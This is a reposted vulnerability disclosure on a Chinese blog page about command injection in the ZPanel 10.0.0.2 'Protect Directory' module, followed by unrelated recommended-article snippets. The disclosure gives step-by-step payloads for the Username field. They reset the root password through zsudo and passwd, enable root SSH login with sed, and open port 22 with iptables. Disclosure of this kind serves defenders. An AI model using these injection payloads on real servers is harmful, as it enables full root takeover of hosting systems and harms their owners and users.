ZPanel 10.0.0.2 Remote Command Execution

最新推荐文章于 2022-12-09 16:19:48 发布

cnbird2008

最新推荐文章于 2022-12-09 16:19:48 发布

阅读量966

点赞数

我们发现 ZPanel 10.0.0.2 版本中存在一个严重的安全漏洞，允许任何人通过页面访问（管理员、分销商和客户默认权限）执行任意命令，只需简单几步即可利用此漏洞。

One of our expert team members (shachibista@gmail.com) who is assigned
to do the security audit of ZPanel code has found the follwoing
security vulnerability with ZPanel 10.0.0.2 which will allow anyone to
escalate the root accress and access the server by anyone. The
security audit states the following:

<QUOTE>
I have been reviewing ZPanel code and there is a serious remote
execution vulnerability in the "Protect Directory" module that allows
anyone with access to the page (Administrators, Resellers and Clients
by default) to execute arbitrary commands on the shell due to improper
(non-existent) escaping of user input. The following steps can be
taken to reproduce the exploit:

1. Login as any user and visit
http://<server_address>/?module=htpasswd&selected=Selected&path=/

1a. In the "Username" field input (including the initial semicolon and
the final hash):

;/etc/zpanel/panel/bin/zsudo "echo 'newpassword'" "| passwd --stdin root" #

2. Type any password

3. Root password will be set to "newpassword"

4. Visit http://<server_address>/?module=htpasswd&selected=Selected&path=/

5. In the "Username" field (including initial semicolon and final hash):

;/etc/zpanel/panel/bin/zsudo sed '-i "s/#*\(PermitRootLogin\)/\1 yes
\#/" /etc/ssh/*hd*g' #

6. This will enable root login,

7. One can repeat the same process to open port 22 through iptables
(iptables -A INPUT -p tcp --dport 22 -j ACCEPT) and restart the ssh
server (this will require the process twice as the internal buffer
size of zsudo command is 100 characters)
<UNQUOTE>

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cnbird2008

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

java 图片标注_怎么用java做一个图像细胞的标注测试的工具?，实现图片放大，框图，定位坐标？...

weixin_32211599的博客

02-16

447

展开全部public class PhotoFrame extends JFrame{private static final long serialVersionUID = -2216276219179107707L;private Container con;private MousePanel zPanel;private JScrollPane imgSp;private JPanel b...

zpanel ZXTS.zpp

08-16

找了很多地方，都update 不成功，后来发现这个很好

参与评论您还未登录，请先登录后发表或查看评论

安装Zpanel+汉化

azhedashuaibi的博客

08-31

3478

32bit： wget http://www.zvps.co.uk/sites/default/files/downloads/centos-6-3/package/installer-x86-install.sh.x.tar.gz tar -xf installer-x86-install.sh.x.tar.gz chmod +x insta

【废了-准备删除02】信息收集——基于WAMP的drupal7.x管理系统

热门推荐

Fighting_hawk的博客

03-23

1万+

1.本节内容对目标站点进行信息收集，包括IP、端口、目录、指纹等，为后续渗透测试提供了方向。 2. 对于139端口，是samba服务端口，可以考虑爆破、未授权访问、远程代码执行。 3.对于445端口，是SMB服务端口，可以考虑空会话攻击。 4.对于3306端口，可以考虑注入、提权、爆破。 5. 对于80端口，可以考虑Web 攻击、爆破、对应服务器版本漏洞。...

升级mysql后zpanel无法进入_升级到mysql5.7无法启动问题解决

weixin_39798031的博客

01-20

171

漏洞扫描，老项目升级到5.7位成功，启动发现报错：unknown option log_error线备份my.cnf配置文件，猜测应该是写法有问题，先把log_error 改成log#log_error = /var/mysql/error.loglog = /var/mysql/error.log检查日志发现继续报错：unknown variable 'key-buffer=256M' ，修改...

ctf：kali2：扫描mysql版本：auxiliary/scanner/mysql/mysql_version

viviliving的专栏

12-09

1755

msf6 >msf6 >exploit。

CentOS 6 安装免费虚拟主机控制面板ZPanel

iteye_9840的博客

12-31

439

官方：http://www.zpanelcp.com/ ZPanel是一个免费的虚拟主机控制面板,支持Windows,Linux,UNIX和MacOSX等多个操作系统的服务器。ZPanel能使家用或专业服务器成为一个完全成熟，易于使用和管理的网站托管服务器。对于易于使用的控制面板，用户可以创建和管理MySQL数据库，电子邮件信箱，代理和分销的名单，也能在一台服务器设置托管多个域名。这个...

Kali linux 2016.2（Rolling）中的Exploits模块详解

weixin_34376562的博客

11-08

7935

简单来讲，这个Exploits模块，就是针对不同的已知漏洞的利用程序。 root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtua...

ZPanel-开源免费的虚拟主机在线管理系统

weixin_30535167的博客

04-02

247

建站的都知道cPanel、DirectAdmin等强大的主机控制面板，但他们都是收费的，而且收取的费用还不低。免费的Kloxo的大家可能也比较熟悉的。今天给大家介绍的是ZPanel，这是个功能不错，且开源免费的虚拟主机在线管理系统。现在的VPS价格不高，很多朋友都开始玩VPS了。买了VPS后最重要的就是装WEB环境了，尽管LNMP一键安装包已经很是强大，但还是不是人喜欢有控制面板的，这样方便管...

手把手教你ZPanelX 10.0.0在window下的汉化

第二天堂

02-01

1034

zpanelx10.0.0 下载http://www.zpanelcp.com/page/downloads ，记住，core和stack2个文件都要下载安装时候，先安装40多m的大文件，然后再安装10多m的小文件，如果系统是03的话，需要手动安装.net插件（会有提示你错误），如果没有安装的话，会有部分功能实现不了。顺带说一下，旧版的汉化很简单，只需要在lang目录

[主机域名]Zpanel v2.0完全汉化版_zpanel20hh.rar

08-10

【Zpanel v2.0完全汉化版】是一款流行的开源Web控制面板，它为服务器管理提供了用户友好的界面，尤其适合那些对Linux命令行不熟悉但又想管理自己的服务器或虚拟主机的用户。Zpanel提供了多种功能，包括但不限于网站...

主机域名Zpanel v2.0完全版-zpanel20hh.rar

10-17

【主机域名Zpanel v2.0完全版-zpanel20hh.rar】是一个包含Zpanel v2.0的中文完整版本的压缩文件。Zpanel是一款基于PHP开发的开源免费的服务器控制面板，它允许用户通过Web界面来管理他们的服务器，包括虚拟主机、...

虚拟主机管理系统ZPanel-v2.zip

09-10

ZPanel-v2.zip是该系统的第二个版本，旨在为用户提供更高效、更稳定的平台来托管多个网站。作为一款免费的解决方案，它允许管理员轻松地创建、管理和监控服务器上的虚拟主机账户，从而满足企业和个人用户的多样化...

ASP网站整站程序源码——Zpanel v2.0完全汉化版实例开发.zip

10-17

Zpanel是一款广泛使用的网站控制面板软件，它允许用户轻松管理自己的服务器和网站，包括创建和管理虚拟主机、数据库、电子邮件账户等。 Zpanel v2.0完全汉化版是针对中国用户特别优化的版本，所有的界面、文档和...

智能水务管理平台_基于物联网技术的供水系统远程监控与数据分析平台_通过NB-lot智能水表智能消火栓智能阀门及各类传感器实时采集管道压力流量水位浊度余氯泵频等数据结合GPRS.zip

最新发布

09-11

使用C语言编程实现统计文件内容，资源为源代码

09-11

c语言编程实现对指定文件中的内容进行统计。具体可实现：输入要进行统计的文件的路径及名称，统计出该文件中的字符、空格、数字及其他字符的个数，并将统计结果存到指定的文件中。

人脸遮挡检测，人脸遮挡，tkinter实现简易的人脸五官有无遮挡标注小工具，simple face occlusion label tools

09-11

打开下面链接，直接免费下载资源： https://renmaiwang.cn/s/2htte (最新版、最全版本)人脸遮挡检测，人脸遮挡，tkinter实现简易的人脸五官有无遮挡标注小工具，simple face occlusion label tools

大学生就业平台项目_基于SpringBoot和Vuejs的全栈式高校人才招聘与职业发展服务系统_提供企业岗位发布学生简历投递在线面试安排就业数据分析职业规划指导技能培训.zip

09-11

二自由度悬架传递函数-多阻尼对比

09-11

在车辆工程中，悬架系统的性能评估和优化一直是研究的热点。悬架不仅关乎车辆的乘坐舒适性，还直接影响到车辆的操控性和稳定性。为了深入理解悬架的动态行为，研究人员经常使用“二自由度悬架模型”来简化分析，并运用“传递函数”这一数学工具来描述悬架系统的动态特性。二自由度悬架模型将复杂的车辆系统简化为两个独立的部分：车轮和车身。这种简化模型能够较准确地模拟出车辆在垂直方向上的运动行为，同时忽略了侧向和纵向的动态影响，这使得工程师能够更加专注于分析与优化与垂直动态相关的性能指标。传递函数作为控制系统理论中的一种工具，能够描述系统输入和输出之间的关系。在悬架系统中，传递函数特别重要，因为它能够反映出路面不平度如何被悬架系统转化为车内乘员感受到的振动。通过传递函数，我们可以得到一个频率域上的表达式，从中分析出悬架系统的关键动态特性，如系统的振幅衰减特性和共振频率等。在实际应用中，工程师通过使用MATLAB这类数学软件，建立双质量悬架的数学模型。模型中的参数包括车轮质量、车身质量、弹簧刚度以及阻尼系数等。通过编程求解，工程师可以得到悬架系统的传递函数，并据此绘制出传递函数曲线。这为评估悬架性能提供了一个直观的工具，使工程师能够了解悬架在不同频率激励下的响应情况。

Zpanel v2.0完全版汉化安装教程

资源摘要信息:"Zpanel v2.0完全版-zpanel20hh.rar" Zpanel是一款开源的主机管理面板软件，最初设计为提供简单易用的服务器管理和域名控制功能。它允许用户通过友好的Web界面来管理多种服务，包括但不限于FTP账户、...